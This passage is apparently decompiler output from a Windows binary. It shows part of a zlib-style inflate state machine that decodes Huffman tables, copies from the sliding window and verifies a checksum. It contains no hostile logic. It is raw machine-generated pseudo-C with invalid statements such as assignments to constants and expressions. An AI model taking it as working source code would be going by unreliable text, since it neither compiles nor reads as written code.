											__ecx = __ecx + 0x101;
											__eax = __ebx;
											 *(__edi + 0x60) = __ecx;
											__ebx = __ebx >> 5;
											__ecx = __ebx;
											__eax = __eax & 0x0000001f;
											__ecx = __ebx & 0x0000000f;
											__eax = __eax + 1;
											__ecx = (__ebx & 0x0000000f) + 4;
											__ebx = __ebx >> 4;
											__esi = __esi - 0xe;
											 *(__edi + 0x64) = __eax;
											 *(__edi + 0x5c) = __ecx;
											if( *(__edi + 0x60) > 0x11e || __eax > 0x1e) {
												goto L34;
											} else {
												 *(__edi + 0x68) = 0;
												 *__edi = 0x10;
												goto L166;
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0xe) {
													continue;
												} else {
													goto L163;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0x10:
										L166:
										__ecx =  *(__edi + 0x68);
										if( *(__edi + 0x68) >=  *(__edi + 0x5c)) {
											L172:
											__eax = 0x13;
											while( *(__edi + 0x68) < 0x13) {
												__edx =  *(__edi + 0x68);
												__ecx =  *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												__edx = 0;
												 *((short*)(__edi + 0x70 + ( *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __dx;
												 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
											}
											__eax = __edi + 0x530;
											__ecx = __edi + 0x6c;
											 *(__edi + 0x6c) = __eax;
											 *(__edi + 0x4c) = __eax;
											__edx = __edi + 0x2f0;
											__eax = __edi + 0x54;
											 *(__edi + 0x54) = 7;
											__eax = __edi + 0x70;
											__eax = E00408C60(0, __edi + 0x70, 0x13, __edi + 0x6c, __edi + 0x70, __edi + 0x2f0);
											__edx =  *(__esp + 0x28);
											 *(__esp + 0x30) = __eax;
											if(__eax != 0) {
												goto L302;
											} else {
												 *(__edi + 0x68) = __eax;
												 *__edi = 0x11;
												goto L177;
											}
										} else {
											do {
												if(__esi >= 3) {
													goto L171;
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebp =  &(__ebp[1]);
														__ebx = __ebx + __eax;
														 *(__esp + 0x10) = __edx;
														if(__esi < 3) {
															continue;
														} else {
															goto L171;
														}
														goto L331;
													}
													goto L312;
												}
												goto L331;
												L171:
												__eax =  *(__edi + 0x68);
												__eax =  *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												__ebx = __ebx & 0x00000007;
												 *((short*)(__edi + 0x70 + __eax * 2)) = __cx;
												 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
												__ecx =  *(__edi + 0x68);
												__ebx = __ebx >> 3;
												__esi = __esi - 3;
											} while ( *(__edi + 0x68) <  *(__edi + 0x5c));
											goto L172;
										}
										goto L331;
									case 0x11:
										L177:
										__eax =  *(__edi + 0x64);
										__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
										if( *(__edi + 0x68) >= __eax) {
											L210:
											if( *__edi == 0x1b) {
												goto L304;
											} else {
												__eax = __edi + 0x530;
												__ecx = __edi + 0x6c;
												 *(__edi + 0x6c) = __eax;
												__edx = __edi + 0x2f0;
												 *(__edi + 0x4c) = __eax;
												__eax = __edi + 0x54;
												__ecx =  *(__edi + 0x60);
												__edx = __edi + 0x70;
												 *(__edi + 0x54) = 9;
												__eax = E00408C60(1, __edi + 0x70,  *(__edi + 0x60),  *(__edi + 0x60), __edi + 0x54, __edi + 0x2f0);
												 *(__esp + 0x30) = __eax;
												if(__eax == 0) {
													__edx =  *(__edi + 0x6c);
													__ecx = __edi + 0x6c;
													 *(__edi + 0x50) =  *(__edi + 0x6c);
													__edx = __edi + 0x2f0;
													__eax = __edi + 0x58;
													__ecx =  *(__edi + 0x60);
													 *(__edi + 0x58) = 6;
													__eax =  *(__edi + 0x64);
													__edx = __edi + 0x70 +  *(__edi + 0x60) * 2;
													__eax = E00408C60(2, __edi + 0x70 +  *(__edi + 0x60) * 2,  *(__edi + 0x64), __edi + 0x6c,  *(__edi + 0x64), __edi + 0x2f0);
													__edx =  *(__esp + 0x28);
													 *(__esp + 0x30) = __eax;
													if(__eax == 0) {
														 *__edi = 0x12;
														goto L216;
													} else {
														__eax =  *(__esp + 0x40);
														 *(__eax + 0x18) = 0x41d338;
														goto L303;
													}
												} else {
													__eax =  *(__esp + 0x40);
													__edx =  *(__esp + 0x10);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											}
										} else {
											do {
												__ecx =  *(__edi + 0x54);
												1 = 1 << __cl;
												__ecx =  *(__edi + 0x4c);
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
												1 = 1 >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x14) = 1;
												if((__cl & 0x000000ff) <= __esi) {
													L181:
													__eax = __eax >> 0x10;
													if(__eax >> 0x10 >= 0x10) {
														__cx =  *((intOrPtr*)(__esp + 0x16));
														if(__cx != 0x10) {
															__ecx = __ah & 0x000000ff;
															 *(__esp + 0x2c) = __ecx;
															if(__cx != 0x11) {
																__eax = __ecx + 7;
																if(__esi >= __eax) {
																	L203:
																	__ebx = __ebx >> __cl;
																	__ebx = __ebx & 0x0000007f;
																	__eax = (__ebx & 0x0000007f) + 0xb;
																	 *(__esp + 0x14) = (__ebx & 0x0000007f) + 0xb;
																	__ebx = __ebx >> 7;
																	__eax = 0xfffffff9;
																	goto L204;
																} else {
																	while(__edx != 0) {
																		__eax =  *__ebp & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebp & 0x000000ff) << __cl;
																		__ecx =  *(__esp + 0x2c);
																		__edx = __edx - 1;
																		__esi = __esi + 8;
																		__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																		__eax = __ecx + 7;
																		__ebp =  &(__ebp[1]);
																		 *(__esp + 0x10) = __edx;
																		if(__esi < __eax) {
																			continue;
																		} else {
																			goto L203;
																		}
																		goto L331;
																	}
																	goto L312;
																}
															} else {
																__eax = __ecx + 3;
																if(__esi >= __eax) {
																	L199:
																	__ebx = __ebx >> __cl;
																	__ebx = __ebx & 0x00000007;
																	__eax = (__ebx & 0x00000007) + 3;
																	 *(__esp + 0x14) = (__ebx & 0x00000007) + 3;
																	__ebx = __ebx >> 3;
																	__eax = 0xfffffffd;
																	L204:
																	__esi = __esi + __eax;
																	__eax =  *(__esp + 0x14);
																	 *(__esp + 0x20) = 0;
																	goto L205;
																} else {
																	while(__edx != 0) {
																		__eax =  *__ebp & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebp & 0x000000ff) << __cl;
																		__ecx =  *(__esp + 0x2c);
																		__edx = __edx - 1;
																		__esi = __esi + 8;
																		__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																		__eax = __ecx + 3;
																		__ebp =  &(__ebp[1]);
																		 *(__esp + 0x10) = __edx;
																		if(__esi < __eax) {
																			continue;
																		} else {
																			goto L199;
																		}
																		goto L331;
																	}
																	goto L312;
																}
															}
														} else {
															__ecx = __ah & 0x000000ff;
															__eax = __ecx + 2;
															 *(__esp + 0x2c) = __ecx;
															if(__esi >= __eax) {
																L192:
																__eax =  *(__edi + 0x68);
																__ebx = __ebx >> __cl;
																__esi = __esi - __ecx;
																if(__eax == 0) {
																	goto L302;
																} else {
																	__ecx =  *(__edi + 0x6e + __eax * 2) & 0x0000ffff;
																	__ebx = __ebx & 0x00000003;
																	__eax = (__ebx & 0x00000003) + 3;
																	__ebx = __ebx >> 2;
																	 *(__esp + 0x20) = __ecx;
																	 *(__esp + 0x14) = __eax;
																	__esi = __esi - 2;
																	L205:
																	__ecx =  *(__edi + 0x68);
																	__ecx =  *(__edi + 0x68) + __eax;
																	 *(__edi + 0x64) =  *(__edi + 0x64) +  *(__edi + 0x60);
																	if(__ecx >  *(__edi + 0x64) +  *(__edi + 0x60)) {
																		L34:
																		__eax =  *(__esp + 0x40);
																		 *(__eax + 0x18) = 0x41d338;
																		goto L303;
																	} else {
																		if( *(__esp + 0x14) != 0) {
																			__eax =  *(__esp + 0x20);
																			do {
																				__ecx =  *(__edi + 0x68);
																				 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
																				 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __ax;
																				 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
																			} while ( *(__esp + 0x14) != 0);
																		}
																		goto L209;
																	}
																}
															} else {
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__ecx =  *(__esp + 0x2c);
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																	__eax = __ecx + 2;
																	__ebp =  &(__ebp[1]);
																	 *(__esp + 0x10) = __edx;
																	if(__esi < __eax) {
																		continue;
																	} else {
																		goto L192;
																	}
																	goto L331;
																}
																goto L312;
															}
														}
													} else {
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														if(__esi >= (__cl & 0x000000ff)) {
															L186:
															__ecx = __ah & 0x000000ff;
															__eax =  *(__edi + 0x68);
															__ebx = __ebx >> __cl;
															__esi = __esi - (__ah & 0x000000ff);
															__cx =  *((intOrPtr*)(__esp + 0x16));
															 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __cx;
															 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
															goto L209;
														} else {
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																__eax =  *(__esp + 0x14);
																__ecx = __ah & 0x000000ff;
																 *(__esp + 0x10) = __edx;
																if(__esi < (__ah & 0x000000ff)) {
																	continue;
																} else {
																	goto L186;
																}
																goto L331;
															}
															goto L312;
														}
													}
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__ecx =  *(__edi + 0x54);
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
														1 = 1 << __cl;
														__ecx =  *(__edi + 0x4c);
														__ebp =  &(__ebp[1]);
														 *(__esp + 0x10) = __edx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
														__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
														1 = 1 >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__esp + 0x14) = 1;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L181;
														}
														goto L331;
													}
													goto L312;
												}
												goto L331;
												L209:
												__eax =  *(__edi + 0x64);
												__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
											} while ( *(__edi + 0x68) < __eax);
											goto L210;
										}
										goto L331;
									case 0x12:
										L216:
										if(__edx < 6 ||  *(__esp + 0x18) < 0x102) {
											__ecx =  *(__edi + 0x54);
											1 = 1 << __cl;
											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
											__ecx = (0x00000001 << __cl) - 0x00000001 & __ebx;
											__eax =  *(__edi + 0x4c);
											__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											 *(__esp + 0x14) = __eax;
											if((__cl & 0x000000ff) <= __esi) {
												L223:
												if(__al == 0 || (__al & 0x000000f0) != 0) {
													L230:
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													__ebx = __ebx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x20) = __ecx;
													__eax = __eax >> 0x10;
													 *(__edi + 0x40) = __eax >> 0x10;
													if(__al != 0) {
														if((__al & 0x00000020) == 0) {
															if((__al & 0x00000040) == 0) {
																__al & 0x000000ff = __al & 0xf;
																 *(__edi + 0x48) = __al & 0xf;
																 *__edi = 0x13;
																goto L237;
															} else {
																__eax =  *(__esp + 0x40);
																 *(__eax + 0x18) = 0x41d338;
																goto L303;
															}
														} else {
															L233:
															 *__edi = 0xb;
															goto L304;
														}
													} else {
														 *__edi = 0x17;
														goto L304;
													}
												} else {
													__eax = __eax >> 8;
													 *(__esp + 0x34) = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x20) = __cl & 0x000000ff;
													__al & 0x000000ff = (__al & 0x000000ff) +  *(__esp + 0x20);
													 *(__esp + 0x2c) = __eax;
													1 = 1 << __cl;
													__ecx =  *(__esp + 0x20);
													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
													__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
													 *(__esp + 0x14) =  *(__esp + 0x14) >> 0x10;
													__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
													__ecx = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
													__eax =  *(__edi + 0x4c);
													__eax =  *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10)) * 4);
													__ecx =  *(__esp + 0x34) & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax = __al & 0x000000ff;
													__eax = (__al & 0x000000ff) + ( *(__esp + 0x34) & 0x000000ff);
													if(__eax <= __esi) {
														L229:
														__ecx =  *(__esp + 0x2d) & 0x000000ff;
														__eax =  *(__esp + 0x14);
														__ebx = __ebx >> __cl;
														__esi = __esi - ( *(__esp + 0x2d) & 0x000000ff);
														goto L230;
													} else {
														while(__edx != 0) {
															__eax =  *__ebp & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebp & 0x000000ff) << __cl;
															__ecx =  *(__esp + 0x2c);
															__edx = __edx - 1;
															__esi = __esi + 8;
															__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
															__eax = __ch & 0x000000ff;
															 *(__esp + 0x20) = __eax;
															__cl & 0x000000ff = (__cl & 0x000000ff) + __eax;
															1 = 1 << __cl;
															__ecx =  *(__esp + 0x20);
															__ebp =  &(__ebp[1]);
															 *(__esp + 0x10) = __edx;
															(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
															__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
															__ecx =  *(__esp + 0x2e) & 0x0000ffff;
															__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff);
															__ecx =  *(__edi + 0x4c);
															__eax =  *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4);
															 *(__esp + 0x14) = 1;
															 *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4) >> 8 = __al & 0x000000ff;
															__eax = (__al & 0x000000ff) +  *(__esp + 0x20);
															if(__eax > __esi) {
																continue;
															} else {
																goto L229;
															}
															goto L331;
														}
														goto L312;
													}
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__ecx =  *(__edi + 0x54);
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
													1 = 1 << __cl;
													__ecx =  *(__edi + 0x4c);
													__ebp =  &(__ebp[1]);
													 *(__esp + 0x10) = __edx;
													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
													__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
													1 = 1 >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x14) = 1;
													if((__cl & 0x000000ff) > __esi) {
														continue;
													} else {
														goto L223;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											__eax =  *(__esp + 0x40);
											__edx =  *(__esp + 0x18);
											__ecx =  *(__esp + 0x24);
											 *(__eax + 0x10) =  *(__esp + 0x18);
											__edx =  *(__esp + 0x28);
											 *(__eax + 0xc) =  *(__esp + 0x24);
											__ecx =  *(__esp + 0x10);
											_push( *(__esp + 0x28));
											 *__eax = __ebp;
											 *(__eax + 4) = __ecx;
											_push(__eax);
											 *(__edi + 0x38) = __ebx;
											 *(__edi + 0x3c) = __esi;
											__eax = E00406CA0();
											__eax =  *(__esp + 0x48);
											__edx =  *(__eax + 0x10);
											__ecx =  *(__eax + 0xc);
											__ebp =  *__eax;
											__eax =  *(__eax + 4);
											__ebx =  *(__edi + 0x38);
											__esi =  *(__edi + 0x3c);
											 *(__esp + 0x20) = __edx;
											__esp = __esp + 8;
											 *(__esp + 0x24) = __ecx;
											 *(__esp + 0x10) = __eax;
											__edx = __eax;
											goto L304;
										}
										goto L331;
									case 0x13:
										L237:
										__eax =  *(__edi + 0x48);
										if(__eax == 0) {
											L243:
											 *__edi = 0x14;
											goto L244;
										} else {
											if(__esi >= __eax) {
												L242:
												__ecx =  *(__edi + 0x48);
												1 = 1 << __cl;
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												 *(__edi + 0x40) =  *(__edi + 0x40) + ((0x00000001 << __cl) - 0x00000001 & __ebx);
												__ebx = __ebx >> __cl;
												__esi = __esi -  *(__edi + 0x48);
												goto L243;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi <  *(__edi + 0x48)) {
														continue;
													} else {
														goto L242;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x14:
										L244:
										__ecx =  *(__edi + 0x58);
										1 = 1 << __cl;
										(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
										__ecx = (0x00000001 << __cl) - 0x00000001 & __ebx;
										__eax =  *(__edi + 0x50);
										__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										 *(__esp + 0x14) = __eax;
										if((__cl & 0x000000ff) <= __esi) {
											L248:
											if((__al & 0x000000f0) != 0) {
												L253:
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												__ebx = __ebx >> __cl;
												__esi = __esi - __ecx;
												 *(__esp + 0x20) = __ecx;
												if((__al & 0x00000040) == 0) {
													__ecx = __eax;
													__eax = __al & 0x000000ff;
													__ecx = __ecx >> 0x10;
													__eax = __al & 0xf;
													 *(__edi + 0x44) = __ecx;
													 *(__edi + 0x48) = __al & 0xf;
													 *__edi = 0x15;
													goto L256;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											} else {
												__eax = __eax >> 8;
												 *(__esp + 0x34) = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x20) = __cl & 0x000000ff;
												__al & 0x000000ff = (__al & 0x000000ff) +  *(__esp + 0x20);
												 *(__esp + 0x2c) = __eax;
												1 = 1 << __cl;
												__ecx =  *(__esp + 0x20);
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
												 *(__esp + 0x14) =  *(__esp + 0x14) >> 0x10;
												__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
												__ecx = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
												__eax =  *(__edi + 0x50);
												__eax =  *( *(__edi + 0x50) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10)) * 4);
												__ecx =  *(__esp + 0x34) & 0x000000ff;
												 *(__esp + 0x14) = __eax;
												__eax = __al & 0x000000ff;
												__eax = (__al & 0x000000ff) + ( *(__esp + 0x34) & 0x000000ff);
												if(__eax <= __esi) {
													L252:
													__ecx =  *(__esp + 0x2d) & 0x000000ff;
													__eax =  *(__esp + 0x14);
													__ebx = __ebx >> __cl;
													__esi = __esi - ( *(__esp + 0x2d) & 0x000000ff);
													goto L253;
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__ecx =  *(__esp + 0x2c);
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
														__eax = __ch & 0x000000ff;
														 *(__esp + 0x20) = __eax;
														__cl & 0x000000ff = (__cl & 0x000000ff) + __eax;
														1 = 1 << __cl;
														__ecx =  *(__esp + 0x20);
														__ebp =  &(__ebp[1]);
														 *(__esp + 0x10) = __edx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
														__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
														__ecx =  *(__esp + 0x2e) & 0x0000ffff;
														__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff);
														__ecx =  *(__edi + 0x50);
														__eax =  *( *(__edi + 0x50) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4);
														 *(__esp + 0x14) = 1;
														 *( *(__edi + 0x50) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4) >> 8 = __al & 0x000000ff;
														__eax = (__al & 0x000000ff) +  *(__esp + 0x20);
														if(__eax > __esi) {
															continue;
														} else {
															goto L252;
														}
														goto L331;
													}
													goto L312;
												}
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__ecx =  *(__edi + 0x58);
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
												1 = 1 << __cl;
												__ecx =  *(__edi + 0x50);
												__ebp =  &(__ebp[1]);
												 *(__esp + 0x10) = __edx;
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
												1 = 1 >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x14) = 1;
												if((__cl & 0x000000ff) > __esi) {
													continue;
												} else {
													goto L248;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0x15:
										L256:
										__eax =  *(__edi + 0x48);
										if(__eax == 0) {
											L261:
											 *((intOrPtr*)(__edi + 0x2c)) =  *((intOrPtr*)(__edi + 0x2c)) -  *(__esp + 0x18);
											__ecx =  *((intOrPtr*)(__edi + 0x2c)) -  *(__esp + 0x18) +  *(__esp + 0x28);
											if( *(__edi + 0x44) <=  *((intOrPtr*)(__edi + 0x2c)) -  *(__esp + 0x18) +  *(__esp + 0x28)) {
												 *__edi = 0x16;
												goto L264;
											} else {
												__eax =  *(__esp + 0x40);
												 *(__eax + 0x18) = 0x41d338;
												goto L303;
											}
										} else {
											if(__esi >= __eax) {
												L260:
												__ecx =  *(__edi + 0x48);
												1 = 1 << __cl;
												__eax = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __ebx;
												 *(__edi + 0x44) =  *(__edi + 0x44) + __eax;
												__ebx = __ebx >> __cl;
												__esi = __esi -  *(__edi + 0x48);
												goto L261;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi <  *(__edi + 0x48)) {
														continue;
													} else {
														goto L260;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x16:
										L264:
										if( *(__esp + 0x18) == 0) {
											goto L312;
										} else {
											__ecx =  *(__esp + 0x28);
											__ecx =  *(__esp + 0x28) -  *(__esp + 0x18);
											__eax =  *(__edi + 0x44);
											if(__eax <= __ecx) {
												__ecx =  *(__esp + 0x24);
												__ecx =  *(__esp + 0x24) - __eax;
												__eax =  *(__edi + 0x40);
												 *(__esp + 0x2c) = __ecx;
												 *(__esp + 0x34) = __eax;
												goto L272;
											} else {
												__eax = __eax - __ecx;
												__ecx =  *(__edi + 0x30);
												 *(__esp + 0x14) = __eax;
												if(__eax <= __ecx) {
													 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) - __eax;
													__ecx =  *((intOrPtr*)(__edi + 0x34)) - __eax +  *(__edi + 0x30);
													__eax =  *(__esp + 0x14);
												} else {
													__eax = __eax - __ecx;
													 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28));
													 *(__esp + 0x14) = __eax;
													__ecx =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28)) - __eax;
												}
												 *(__esp + 0x2c) = __ecx;
												__ecx =  *(__edi + 0x40);
												 *(__esp + 0x34) = __ecx;
												if(__eax > __ecx) {
													__eax = __ecx;
													L272:
													 *(__esp + 0x14) = __eax;
												}
											}
											__ecx =  *(__esp + 0x18);
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x14) = __eax;
											}
											 *(__esp + 0x18) = __ecx;
											__ecx =  *(__esp + 0x34);
											__ecx =  *(__esp + 0x34) - __eax;
											__eax =  *(__esp + 0x24);
											 *(__edi + 0x40) = __ecx;
											do {
												__ecx =  *(__esp + 0x2c);
												__cl =  *( *(__esp + 0x2c));
												 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
												 *__eax = __cl;
												__eax = __eax + 1;
												_t549 = __esp + 0x14;
												 *_t549 =  *(__esp + 0x14) - 1;
											} while ( *_t549 != 0);
											 *(__esp + 0x24) = __eax;
											if( *(__edi + 0x40) == 0) {
												 *__edi = 0x12;
											}
											goto L304;
										}
										goto L331;
									case 0x17:
										if( *(__esp + 0x18) == 0) {
											goto L312;
										} else {
											__eax =  *(__esp + 0x24);
											__cl =  *(__edi + 0x40);
											 *__eax = __cl;
											__eax = __eax + 1;
											 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
											 *(__esp + 0x24) = __eax;
											 *__edi = 0x12;
											goto L304;
										}
										goto L331;
									case 0x18:
										if( *((intOrPtr*)(__edi + 8)) == 0) {
											L295:
											 *__edi = 0x19;
											goto L296;
										} else {
											if(__esi >= 0x20) {
												L285:
												__eax =  *(__esp + 0x28);
												__eax =  *(__esp + 0x28) -  *(__esp + 0x18);
												__ecx =  *(__esp + 0x40);
												 *((intOrPtr*)( *(__esp + 0x40) + 0x14)) =  *((intOrPtr*)( *(__esp + 0x40) + 0x14)) + __eax;
												 *((intOrPtr*)(__edi + 0x1c)) =  *((intOrPtr*)(__edi + 0x1c)) + __eax;
												 *(__esp + 0x28) = __eax;
												if(__eax != 0) {
													__ecx =  *(__esp + 0x24);
													__edx =  *(__edi + 0x18);
													_push(__eax);
													_push(__ecx);
													_push( *(__edi + 0x18));
													if( *(__edi + 0x10) == 0) {
														__eax = E004024A0();
													} else {
														__eax = E00403080();
													}
													__ecx =  *(__esp + 0x4c);
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
													__esp = __esp + 0xc;
													 *(__ecx + 0x30) = __eax;
												}
												__eax =  *(__esp + 0x18);
												 *(__esp + 0x28) =  *(__esp + 0x18);
												__eax = __ebx;
												if( *(__edi + 0x10) == 0) {
													__eax = __eax & 0x0000ff00;
													__ebx = __ebx << 0x10;
													__eax = __eax + (__ebx << 0x10);
													__ebx = __ebx >> 8;
													__ecx = __ebx >> 0x00000008 & 0x0000ff00;
													__eax = __eax << 8;
													__eax = __eax + (__ebx >> 0x00000008 & 0x0000ff00);
													__ebx = __ebx >> 0x18;
													__eax = __eax + (__ebx >> 0x18);
												}
												if(__eax ==  *(__edi + 0x18)) {
													__ebx = 0;
													__esi = 0;
													goto L295;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x20) {
